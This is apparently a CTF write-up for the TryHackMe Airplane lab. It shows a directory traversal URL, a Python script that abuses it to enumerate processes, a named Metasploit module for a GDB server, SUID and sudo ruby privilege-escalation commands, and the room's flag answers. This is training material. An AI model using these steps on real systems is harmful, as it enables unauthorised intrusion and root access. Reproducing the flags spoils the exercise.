We covered a CTF scenario where we started with nmap scanning followed by enumeration of the web application running on port 8000 where we discovered a directory traversal vulnerability allowing us to read the contents of sensitive files such as /etc/passwd. Using Python, we discovered the process name that is listening on port 6048 discovered during nmap scan. The application name was GDB server and we used Metasploit to exploit it and gain Meterpreter shell. Privilege escalation was achieved horizontally first by looking for binaries with SUID bit set and then to root using ruby. This was part of TryHackMe Airplane CTF room.

Offensive Security Certified Professional Study Notes

OSINT Study Notes

Web Application Enumeration

We know from the scanning phase that the webserver runs on port 8000 so by visiting and testing the page we discover it’s vulnerability to directory traversal.

If you attempt to use the below URL in the request, you will be able to view the password file on Linux:

http://airplane.thm:8000/page.html=../../../etc/passwd

By visiting  /proc/net/tcp, we will get the list of active network connections. By using this reference, we can match the columns with their values to extract insights such as the local port, local address and remote port.

We find that port 6048 → hex (17A0) also has an active unknown service so we set sights to find out what’s behind it.

Using Python to Uncover the Hidden Process

Below is the python script used to reveal the name of the process listening on port 6048

import requests

def read_file(base_url, path):
file_url = f"{base_url}/?page=../../../../{path}"
try:
response = requests.get(file_url)
if response.status_code == 200:
return response.text
else:
return None
except Exception as e:
print(f"Error reading {path}: {e}")
return None

def find_pid_by_port(base_url, port):
for pid in range(1, 5000): # Adjust the range based on the expected number of PIDs
cmdline_path = f"proc/{pid}/cmdline"
cmdline = read_file(base_url, cmdline_path)
if cmdline:
if str(port) in cmdline:
return pid
return None

# Example usage
base_url = 'http://airplane.thm:8000'
port = '6048'
pid = find_pid_by_port(base_url, port)
if pid:
cmdline = read_file(base_url, f"proc/{pid}/cmdline")
status = read_file(base_url, f"proc/{pid}/status")
print(f'PID using port {port}: {pid}')
print(f'Command line: {cmdline}')
print(f'Status: {status}')
else:
print(f'No process found using port {port}')

The name of the process is: GDB server

Exploitation with Metasploit

We used the module exploit multi/gdb/gdb_server_exec to perform the exploitation and get Meterpreter shell.

Linux Privilege Escalation

First we performed horizontal privilege escalation from user hudson to user carlos by looking for binaries with SUID bit set.

find / -user carlos -perm -u=s 2>/dev/null

Then we run

/usr/bin/find . -exec /bin/sh -p \; -quit

Later down the road, you can run the below command:

sudo -l 

And you will find that you can run /usr/bin/ruby /root/*.rb  as sudo.

Check out the video below for detailed explanation.

Room Answers | TryHackMe Airplane CTF

What is user.txt

eebfca2ca5a2b8a56c46c781aeea7562

What is root.txt

190dcbeb688ce5fe029f26a1e5fce002

Finally, completing the TryHackMe “Airplane” task allowed for a practical investigation of cybersecurity methods. Every stage of the penetration testing process, from using Nmap for preliminary reconnaissance to leveraging SUID misconfigurations and Local File Inclusion (LFI) vulnerabilities, provided insightful learning experiences. Through escalation of privileges to the carlos account and, eventually, root.txt access, I reaffirmed the importance of meticulous exploitation and complete system study.

Video Walkthrough | TryHackMe Airplane CTF

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles